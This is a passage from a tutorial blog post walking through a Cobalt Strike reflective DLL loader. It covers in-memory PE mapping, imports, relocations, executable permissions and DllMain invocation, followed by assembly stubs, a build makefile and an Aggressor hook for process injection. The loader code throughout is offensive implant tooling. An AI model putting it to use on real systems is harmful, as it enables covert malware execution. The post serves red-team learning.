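In the usage I have in mind, **delta** is the actual load address minus the preferred **ImageBase**, so a pointer that was linked as `0x180001234` becomes `0x180011234` when the image lands `0x10000` bytes higher than expected.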

### DLL Entry

Finally! We've got all the components necessary for loading a **PE**. Our final step is to set up a main function that will process all this information and execute our **UDRL** in memory. The process behind our main function requires the following steps.

* Allocate memory for size of our image
* Copy each section to our new allocated memory space
* Initialise import table
* Apply relocations
* Set the memory permission to be executable
* Execute entry point of DLL

The first step is resolving the addresses of the [**NtAllocateVirtualMemory**](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntallocatevirtualmemory) and [**NtProtectVirtualMemory**](https://doxygen.reactos.org/d2/dfa/ntoskrnl_2mm_2ARM3_2virtual_8c.html#a2cab978ee136ac00a0c06b56aa9170ef) functions in the **ntdll** library.

```
Resolve.Dll.Ntdll = LoadPebModule(NTDLL_HASH);

Resolve.Function.NtAllocateVirtualMemory	= LoadExports(Resolve.Dll.Ntdll, NTALLOCATEVIRTUALMEMORY_HASH);

Resolve.Function.NtProtectVirtualMemory		= LoadExports(Resolve.Dll.Ntdll, NTPROTECTVIRTUALMEMORY_HASH);
```

As our code is being injected into memory we first need to find ourselves in the target process' memory space. The **CODE\_END()** macro calculates the end address of the code section relative to the address of the **GetIp** (instruction pointer) symbol in memory. Typecasting the result of this macro to a pointer to an **IMAGE\_DOS\_HEADER** should give us the starting point of our **PE** in memory. This technique is used in **TitanLdr**.

```
#define CODE_END( x )	(ULONG_PTR)( GetIp( ) + 11 )
```

Next, the function obtains the size of our PE image via **SizeOfImage** and allocates a region of memory of that size with **NtAllocateVirtualMemory**.

```
DosHeader = (PIMAGE_DOS_HEADER)CODE_END();

NtHeaders = CONVERT(PIMAGE_NT_HEADERS, DosHeader, DosHeader->e_lfanew);

ZenImageSize = NtHeaders->OptionalHeader.SizeOfImage; 

Status = Resolve.Function.NtAllocateVirtualMemory(NtCurrentProcess(), &ZenBaseAddress, 0, &ZenImageSize, MEM_COMMIT, PAGE_READWRITE);
```

We then need to loop through all the sections of a **PE** file and copy their contents into a new location in memory. The **PE** file is made up of several [sections](https://keystrokes2016.wordpress.com/2016/06/03/pe-file-structure-sections/) that each contain different types of data, such as code, data, or resources.

The **IMAGE\_FIRST\_SECTION** macro returns a pointer to the first section of the **PE** file, **NumberOfSections** is a field that specifies the total number of sections in the file. The loop iterates through each section using an index variable **Index**, which starts at **0** and goes up to one less than the number of sections.

Inside the loop we need to copy the contents of each section from its location in the original **PE** file to a new location in memory. The destination address is calculated by adding the section's virtual address to the base address of the new memory region, and the source address is calculated by adding the section's raw data offset to the base address of the original **PE** file. The size of the data to copy is specified by the **SizeOfRawData** field of the section header.

Overall, this code is essentially copying the entire contents of the original **PE** file into a new memory region, with each section being placed at its correct virtual address.

```
if (NT_SUCCESS(Status)) {

SecHeader = IMAGE_FIRST_SECTION(NtHeaders);

SIZE_T Index = 0;
while (Index < NtHeaders->FileHeader.NumberOfSections) {

  MemCpy
      (

       (PBYTE)ZenBaseAddress + SecHeader[Index].VirtualAddress,
       (PBYTE)DosHeader + SecHeader[Index].PointerToRawData,
       SecHeader[Index].SizeOfRawData
      );

      Index++;
}
```
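The same copy can be sketched portably to make the file offset versus virtual address distinction concrete. This is a simplified illustration with assumed names: **mock\_section** is a hypothetical cut-down **IMAGE\_SECTION\_HEADER**, **map\_sections** is a hypothetical helper, and the bounds checks are an addition that the loop above does not perform.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical cut-down IMAGE_SECTION_HEADER. */
typedef struct mock_section {
    uint32_t virtual_address;      /* RVA of the section once mapped */
    uint32_t size_of_raw_data;     /* bytes stored in the file */
    uint32_t pointer_to_raw_data;  /* offset of those bytes in the file */
} mock_section;

/* Copies each section from its file offset to its RVA.
 * Sections that would overflow either buffer are skipped.
 * Returns the number of sections copied. */
static size_t map_sections(uint8_t *mapped, size_t mapped_size,
                           const uint8_t *raw, size_t raw_size,
                           const mock_section *sections, size_t count)
{
    assert(mapped != NULL && raw != NULL && sections != NULL);

    size_t copied = 0;
    for (size_t i = 0; i < count; i++) {
        const mock_section *s = &sections[i];

        if ((size_t)s->pointer_to_raw_data + s->size_of_raw_data > raw_size)
            continue;  /* source range runs past the end of the file */
        if ((size_t)s->virtual_address + s->size_of_raw_data > mapped_size)
            continue;  /* destination range runs past the mapping */

        memcpy(mapped + s->virtual_address,
               raw + s->pointer_to_raw_data,
               s->size_of_raw_data);
        copied++;
    }
    return copied;
}
```

The gap between a section's file offset (for example `0x200`) and its **RVA** (for example `0x1000`) is exactly why a raw **PE** can't just be executed where it sits in memory.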

The next step is processing the **IAT** and relocation table in the input **PE** image. These need to be accessed through the **IMAGE\_DATA\_DIRECTORY** discussed previously.

```
DataDir = &NtHeaders->OptionalHeader.DataDirectory[1];

if (DataDir->VirtualAddress) {

  LoadImports((PVOID)ZenBaseAddress, CONVERT(PVOID, ZenBaseAddress, DataDir->VirtualAddress));
}

DataDir = &NtHeaders->OptionalHeader.DataDirectory[5];

if (DataDir->VirtualAddress) {

  LoadRelocations((PVOID)ZenBaseAddress, CONVERT(PVOID, ZenBaseAddress, DataDir->VirtualAddress), NtHeaders->OptionalHeader.ImageBase);
}
```

The initial protection on our memory pages is **PAGE\_READWRITE**, so we need to change that in order to actually execute our **DLL** in memory. Once that is done we retrieve the address of the entry point function in the input **PE** image and call it, passing the address given by **SYMBOL(Start)** as the first argument. The entry point function is responsible for setting up the remaining program state and transferring control to the program's main code.

```
SecSize = SecHeader->SizeOfRawData;

Status = Resolve.Function.NtProtectVirtualMemory(NtCurrentProcess(), &ZenBaseAddress, &SecSize, PAGE_EXECUTE_READ, &Protections);

if (NT_SUCCESS(Status)) {

  ZenEntry = CONVERT(ZenDllMain, ZenBaseAddress, NtHeaders->OptionalHeader.AddressOfEntryPoint);
  ZenEntry(SYMBOL(Start), 1, NULL);
  ZenEntry(SYMBOL(Start), 4, NULL);
}
```

The **ZenEntry** variable represents **DllMain** which is an entry point into a **DLL**. When the system starts or terminates a process or thread, it calls the entry-point function for each loaded **DLL** using the first thread of the process.

```
BOOL WINAPI DllMain(
  _In_ HINSTANCE hinstDLL,
  _In_ DWORD     fdwReason,
  _In_ LPVOID    lpvReserved
);
```

The **SYMBOL** macro calculates the address of a symbol **x**, which in our case is a function called **Start**, relative to the address of the **GetIp** symbol in memory. Both **Start** and **GetIp** are essentially Assembly stubs we can combine with our C code. Again, this concept is used in ***TitanLdr***.

```
#define SYMBOL( x )      ( ULONG_PTR )( GetIp( ) - ( ( ULONG_PTR ) & GetIp - ( ULONG_PTR ) x ) )
```
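The arithmetic behind the macro is simple once the names are swapped for numbers. The sketch below is my own restatement with a hypothetical helper called **runtime\_address**, and it assumes **GetIp()** returns the runtime address of the **GetIp** stub itself. The distance between two symbols is the same at link time and at runtime, so subtracting the link-time distance from the runtime **GetIp** address gives the runtime address of the other symbol.

```c
#include <assert.h>
#include <stdint.h>

/* runtime(x) = runtime(GetIp) - (link(GetIp) - link(x))
 * Unsigned wrap-around keeps this correct when x sits after GetIp. */
static uintptr_t runtime_address(uintptr_t runtime_get_ip,
                                 uintptr_t link_get_ip,
                                 uintptr_t link_symbol)
{
    assert(runtime_get_ip != 0);
    return runtime_get_ip - (link_get_ip - link_symbol);
}
```

For example, if **GetIp** was linked at `0x5000` and **Start** at `0x1000`, and the stub reports that it is running at `0x40005000`, then **Start** must be at `0x40001000`.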

## Combining C & Assembly

Woah, that was a lot of info right? If you're still with us, I salute you :). If not, no worries I completely understand why, lmao!

So it should be stated that I am no Assembly wizard but will do my best to provide an explanation regarding the code and concepts being applied in this section.

### Section Alignment

Now, when declaring and defining our functions there is a **GRP\_SEC(x)** attribute before the function type and name...why? Essentially the Windows **PE** format has a feature called **Grouped Sections**. This allows several sections in our object files to be merged into a single section of the final image, in an order we control.

In a **PE** file, sections are used to store various types of data, such as code, resources, and data. When the file is loaded into memory, the sections are mapped into memory as separate regions, with each section having its own address and protection attributes.

Grouped sections apply to object files. When a section name contains a **$**, the linker treats everything before the **$** as the name of the image section the contents belong to, and uses the characters after it only to order the contributions. This means code placed in differently suffixed sections still ends up in one section of the image, sharing the same protection attributes, and we get to decide which piece comes first.

Our macro looks like this -

```
#define GRP_SEC( x ) __attribute__(( section( ".text$" #x ) ))
```
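As a quick illustration of how the macro is applied, here is a minimal sketch with two made-up functions, `AddOne` and `Twice`, placed in groups **B** and **C**. The `#if` fallback that turns the macro into nothing is my own addition so the block also builds on non-MinGW toolchains; in the real loader only the MinGW definition is used.

```c
/* The attribute is only applied under MinGW; elsewhere the macro expands to
 * nothing so the sketch still builds (the fallback is an assumption). */
#if defined(__MINGW32__)
#define GRP_SEC( x ) __attribute__(( section( ".text$" #x ) ))
#else
#define GRP_SEC( x )
#endif

/* Both the declaration and the definition carry the group suffix. */
GRP_SEC( B ) int AddOne( int value );
GRP_SEC( C ) int Twice( int value );

/* Lands in .text$B under MinGW. */
GRP_SEC( B ) int AddOne( int value )
{
    return value + 1;
}

/* Lands in .text$C under MinGW, i.e. after everything in .text$B. */
GRP_SEC( C ) int Twice( int value )
{
    return value * 2;
}
```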

Windows documentation states

> ***When determining the image section that will contain the contents of an object section, the linker discards the "$" and all characters that follow it. Thus, an object section named .text$X actually contributes to the .text section in the image.***
>
> ***However, the characters following the "$" determine the ordering of the contributions to the image section. All contributions with the same object-section name are allocated contiguously in the image, and the blocks of contributions are sorted in lexical order by object-section name. Therefore, everything in object files with section name .text$X ends up together, after the .text$W contributions and before the .text$Y contributions.***
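The two rules in that quote can be modelled in a few lines of C. This is only a toy model of the naming rules, not how any real linker is implemented, and `ImageSectionName` and `SortContributions` are hypothetical helper names.

```c
#include <stdlib.h>
#include <string.h>

/* Rule 1: the image section name is everything before the first '$'. */
static void ImageSectionName(const char *objName, char *out, size_t outSize)
{
    size_t len = strcspn(objName, "$");
    if (outSize == 0) {
        return;
    }
    if (len >= outSize) {
        len = outSize - 1; /* truncate rather than overflow */
    }
    memcpy(out, objName, len);
    out[len] = '\0';
}

/* qsort comparator for an array of C strings. */
static int CompareNames(const void *a, const void *b)
{
    return strcmp(*(const char *const *)a, *(const char *const *)b);
}

/* Rule 2: contributions are ordered lexically by object-section name. */
static void SortContributions(const char **names, size_t count)
{
    qsort(names, count, sizeof names[0], CompareNames);
}
```

Sorting `.text$C`, `.text$A`, `.text$B` puts `.text$A` first, and every one of them maps to the image section `.text`.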

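In order to implement this we can create a linker script using the **SECTIONS** command, which controls how input sections are laid out in the final **PE** file. The script below also places **.rdata** inside **.text**, between **.text$E** and **.text$F**, so constant data gets extracted together with the code. This is a technique used in ***TitanLdr***.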

```
SECTIONS
{
   .text :
   {
      *( .text$A )
      *( .text$B )
      *( .text$C )
      *( .text$D )
      *( .text$E )
      *( .rdata* )
      *( .text$F )
    }
}
```

### Stack Alignment

We'll be compiling our shellcode as 64-bit, which means the stack must be 16-byte aligned whenever we call a function. That is to say, if you push a single 8-byte value onto the stack, you should pad it with another 8 bytes. The requirement comes from the x64 calling convention: compiled code may use aligned 128-bit XMM loads and stores, which fault on a misaligned address. We can make sure this stack alignment is in place with some simple assembly code.

```
[BITS 64]

Extern ZenLdr

GLOBAL Start

[SECTION .text$A]

Start:

    push rsi
    mov rsi, rsp
    and rsp, 0FFFFFFFFFFFFFFF0h
    sub rsp, 020h
    call ZenLdr
    mov rsp, rsi
    pop rsi
    ret
```

Quick overview -

**\[BITS 64]** - Tells the assembler to generate 64-bit code.

**Extern ZenLdr** - Declares **ZenLdr**, the name of our main C function, as a symbol defined outside this assembly file so the linker can resolve the **call**.

**GLOBAL Start** - Exports the **Start** label so it is visible to the linker, which also lets us reference it from our C code.

Now, your keen eye may notice the **\[SECTION .text$A]**. This is what we were previously discussing in the *Section Alignment* walkthrough. Here we are placing the instructions in our **Start** procedure in the **.text$A** portion of our text section. Because **.text$A** sorts before every other group, **Start** lands at the very beginning of the **.text** section, so it is the first code to run when the extracted shellcode is executed. It has to run first because if our stack isn't aligned correctly the rest of the code may crash.

The actual **Start** procedure works like this -

\- Save RSI by pushing it onto the stack\
\- Copy RSP into RSI so the original value can be restored\
\- Align RSP down to a 16-byte boundary\
\- Reserve 0x20 (32) bytes of shadow space for the function we call\
\- Call **ZenLdr**, the entry point of our main function\
\- Restore the original value of RSP from RSI\
\- Restore RSI\
\- Return to caller
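The effect of those steps on RSP can be checked with a bit of integer arithmetic. The function below is just a model of the three instructions that touch RSP before the `call`; `StackBeforeCall` is a hypothetical name and nothing here runs real assembly.

```c
#include <stdint.h>

/* Models what Start does to RSP before `call ZenLdr`. */
static uint64_t StackBeforeCall(uint64_t rspOnEntry)
{
    uint64_t rsp = rspOnEntry;

    rsp -= 8;                     /* push rsi                     */
    rsp &= 0xFFFFFFFFFFFFFFF0ull; /* and  rsp, 0FFFFFFFFFFFFFFF0h */
    rsp -= 0x20;                  /* sub  rsp, 020h               */

    return rsp;
}
```

Whatever value RSP has on entry, the result is a multiple of 16. For instance, entry values of `0x1008` and `0x1010` both end up at `0xFE0`.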

## PE Extraction

Once our code is compiled into an executable we'll need to extract the raw binary in order to execute it as shellcode. There are a couple of ways of doing this. One is to use objdump on our executable and place the output in a **.bin** file. However, Python has a module called [pefile](https://pefile.readthedocs.io/en/latest/modules/pefile.html) that offers a nice way of extracting just our **.text** section, which is exactly what the CS documentation asks for -

> ***The reflective loader's executable code is the extracted .text section from a user provided compiled object file. The extracted executable code must be less than 100KB.***
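This post uses Python and pefile for the extraction. Purely to show what that step boils down to, here is a hedged C sketch that walks the PE headers of a file already read into memory and locates the raw bytes of **.text**. It is not the script from the repository; `FindTextSection`, `Rd16`, `Rd32` and `UDRL_MAX_SIZE` are names I made up, and the size check simply encodes the "less than 100KB" limit quoted above.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define UDRL_MAX_SIZE (100u * 1024u) /* limit quoted from the CS documentation */

/* Little-endian field readers, independent of host alignment rules. */
static uint16_t Rd16(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

static uint32_t Rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Locate the raw bytes of .text inside a PE file held in memory.
 * Returns 0 on success, or -1 if the file is malformed, has no .text
 * section, or the section is not below the 100KB limit. */
static int FindTextSection(const uint8_t *file, size_t fileSize,
                           const uint8_t **text, uint32_t *textSize)
{
    if (fileSize < 0x40 || file[0] != 'M' || file[1] != 'Z') {
        return -1;
    }

    uint32_t nt = Rd32(file + 0x3C); /* e_lfanew */
    if ((size_t)nt + 24 > fileSize || memcmp(file + nt, "PE\0\0", 4) != 0) {
        return -1;
    }

    uint16_t count   = Rd16(file + nt + 4 + 2);   /* NumberOfSections     */
    uint16_t optSize = Rd16(file + nt + 4 + 16);  /* SizeOfOptionalHeader */
    size_t   sec     = (size_t)nt + 24 + optSize; /* first section header */

    for (uint16_t i = 0; i < count; i++, sec += 40) {
        if (sec + 40 > fileSize) {
            return -1;
        }
        if (memcmp(file + sec, ".text\0\0\0", 8) != 0) {
            continue;
        }

        uint32_t rawSize = Rd32(file + sec + 16); /* SizeOfRawData    */
        uint32_t rawPtr  = Rd32(file + sec + 20); /* PointerToRawData */
        if ((size_t)rawPtr + rawSize > fileSize || rawSize >= UDRL_MAX_SIZE) {
            return -1;
        }

        *text = file + rawPtr;
        *textSize = rawSize;
        return 0;
    }
    return -1;
}
```

A caller would read the compiled **.exe** into a buffer, pass it to `FindTextSection`, and write the returned bytes to the **.bin** file.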

## Compilation

In order to compile the UDRL we'll be using [***x86\_64-w64-mingw32-gcc***](https://www.mingw-w64.org/downloads/). When compiling the code certain flags need to be put in place in order to set the correct [function ordering, linking scripts, and preventing the inclusion of extraneous code](https://www.rapid7.com/blog/post/2019/11/21/metasploit-shellcode-grows-up-encrypted-and-authenticated-c-shells/) etc.

Below is an example of the complete makefile.

```
CC_X64	:= x86_64-w64-mingw32-gcc

CFLAGS	:= $(CFLAGS) -Os -fno-asynchronous-unwind-tables -nostdlib 
CFLAGS 	:= $(CFLAGS) -fno-ident -fpack-struct=8 -falign-functions=1
CFLAGS  := $(CFLAGS) -s -ffunction-sections -falign-jumps=1 -w
CFLAGS	:= $(CFLAGS) -falign-labels=1 -fPIC -Wl,-TSectionLink.ld
LFLAGS	:= $(LFLAGS) -Wl,-s,--no-seh,--enable-stdcall-fixup

OUTX64	:= ZenLdr.x64.exe
BINX64	:= ZenLdr.x64.bin

all:
	@ echo [+] Compiling ZenLdr
	@ nasm -f win64 asm/Start.asm -o Start.x64.o
	@ nasm -f win64 asm/GetIp.asm -o GetIp.x64.o
	@ $(CC_X64) *.c Start.x64.o GetIp.x64.o -o $(OUTX64) $(CFLAGS) $(LFLAGS) -I.
	@ echo [+] Extracting .text section into $(BINX64)
	@ python3 python3/extract.py -f $(OUTX64) -o $(BINX64)

clean:
	@ rm -rf *.o
	@ rm -rf *.bin
	@ rm -rf *.exe
```

## Execution

Now we're in the end game :p. In order to load our binary into **CS** we'll need an [Aggressor Script](https://download.cobaltstrike.com/aggressor-script/index.html). We'll need to use the [BEACON\_RDLL\_GENERATE](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics_aggressor-scripts/as-resources_hooks.htm#BEACON_RDLL_GENERATE) hook to implement our **UDRL** in **CS**.

There are plenty of ways this payload can be delivered, but one scenario could be that you already have a beacon on your target machine and want to inject into another process running on it.

It should be noted I'm using ***CS 4.7.2***. In version ***4.6*** it was apparently possible to make an **.exe** beacon execute the shellcode directly (demonstrated on the ***KaynStrike*** GitHub), but that doesn't work in ***4.7*** for some reason (my assembly and debugging skills aren't good enough to figure out why either lol). Also, at the time of writing I believe **CS** is now on version ***4.8***, which I have not tested.

The Windows version for the target machine was **10.0.19045**.

Below is a demonstration.

<figure><img src="https://2025655796-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MaxwVTT_BnxzQrp_qMJ%2Fuploads%2FxM0GbmBatwkZ3MYnNEin%2FZenLdr.gif?alt=media&#x26;token=f0fa346e-6aa1-4e1d-8390-7267048afb14" alt=""><figcaption><p>Apologies for crappy resolution! </p></figcaption></figure>

## Conclusion

So there you have it! A working proof of concept **UDRL**. It must be noted that my **PoC** is barebones. There's so much functionality that can be added to it, but the point of this exercise was just to understand the process behind making one. Recently **Kyle Avery**, a security researcher and red teamer, made [**AceLdr**](https://github.com/kyleavery/AceLdr). This UDRL evades memory scanning using techniques like ***Return Address Spoofing***. Definitely check out the [blog post](https://kyleavery.com/posts/avoiding-memory-scanners) and [YouTube video](https://www.youtube.com/watch?v=edIMUcxCueA\&t=2343s\&ab_channel=DEFCONConference)!

There's still a lot more for me to understand regarding **UDRLs** but I hope this blog has at least made some things clearer...if not, sorry for wasting your time :p!

If you've got this far and feel there's something that could be explained better, please let me know :)

Link to the code if you're interested - <https://github.com/Mav3rick33/ZenLdr>

## Credits

Austin Hudson - ***TitanLdr*** (The original **UDRL** which all others have built their **PoCs** from)

C5pider - [***KaynStrike***](https://github.com/Cracked5pider/KaynStrike) (Another UDRL implementation taking inspiration from ***TitanLdr***)

Modexp - Cool security researcher and developer, you should definitely check out his [blog](https://modexp.wordpress.com/)

Hasherezade - Another cool security researcher and developer, check out her [blog](https://hasherezade.github.io/)

Matt Graeber - [Writing Optimized Windows Shellcode in C](https://web.archive.org/web/20201202085848/http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html) (One of the earliest documentations of writing shellcode in C)

Cobalt Strike - [User Defined Reflective Loader](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/malleable-c2-extend_user-defined-rdll.htm?cshid=1054) documentation

ReactOS - cool [website](https://doxygen.reactos.org/index.html) that has a lot of info regarding Undocumented Windows APIs

C Compilation - Concise [video](https://www.youtube.com/watch?v=VDslRumKvRA\&ab_channel=HowTo) about how C code compiles

Tmxlab - (Original language is Korean)

* <https://rninche01.tistory.com/entry/Reflective-DLL-Injection>
* <https://rninche01.tistory.com/entry/Universal-Shell-codex86%EC%9B%90%EB%A6%AC-%EB%B0%8F-%EC%8B%A4%EC%8A%B5?category=838537>

Donut - <https://github.com/TheWover/donut/tree/dafea1702ce2e71d5139c4d583627f7ee740f3ae> (Shellcode loader partly developed by **Modexp**)

PIC Your Malware - A cool Youtube [video](https://www.youtube.com/watch?v=8UCBvvJZw2U\&ab_channel=BruCONSecurityConference) on position independent code

Understanding Windows x64 Assembly - Great [tutorial](https://sonictk.github.io/asm_tutorial/) for understanding x64 Assembly

Reflective DLL Injection explained - A good [video](https://www.youtube.com/watch?v=IX0qUTbXNog\&ab_channel=QNAL) I found explaining **RDI**

Memory Based Library Loading Someone Did That Already - Great [video](https://www.youtube.com/watch?v=RJrxue6LnwE\&t=1613s\&ab_channel=AdrianCrenshaw) about the concept of **MM** and how it's been around since the 90s

Life Of Binaries - The **BEST** overview of the Portable Executable, referenced these [videos](https://www.youtube.com/playlist?list=PLUFkSN0XLZ-n_Na6jwqopTt1Ki57vMIc3) tons of times to better my understanding
